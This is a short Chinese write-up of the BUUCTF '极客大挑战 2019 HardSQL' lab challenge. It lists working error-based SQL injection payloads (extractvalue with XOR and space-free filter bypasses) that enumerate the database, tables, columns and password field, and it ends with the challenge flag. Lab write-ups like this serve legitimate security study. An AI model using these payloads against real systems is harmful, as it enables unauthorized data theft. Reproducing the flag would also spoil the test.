[极客大挑战 2019]HardSQL 1

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[极客大挑战 2019]HardSQL 1

  • 题目
  • 一、做题步骤
    • 1.测试
    • 2.爆数据库
    • 3.爆表名
    • 4.爆字段
    • 5.爆数据
    • 6.获取flag


题目

BUUCTF的[极客大挑战 2019]HardSQL 1
[极客大挑战 2019]HardSQL 1_第1张图片


一、做题步骤

1.测试

1.测试后发现什么都不行
2.使用报错注入

extractvalue()函数:对XML文档进行查询的函数
updatexml()函数:是更新xml文档的函数

2.爆数据库

'^extractvalue(1,concat(0x7e,(select(database()))))%23

[极客大挑战 2019]HardSQL 1_第2张图片

3.爆表名

'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(‘geek’))))%23

[极客大挑战 2019]HardSQL 1_第3张图片

4.爆字段

'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’))))%23

[极客大挑战 2019]HardSQL 1_第4张图片

5.爆数据

'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

[极客大挑战 2019]HardSQL 1_第5张图片

6.获取flag

flag{a3d5b774-530a-427d-b087-a2b83088f6ce}

你可能感兴趣的:(数据库)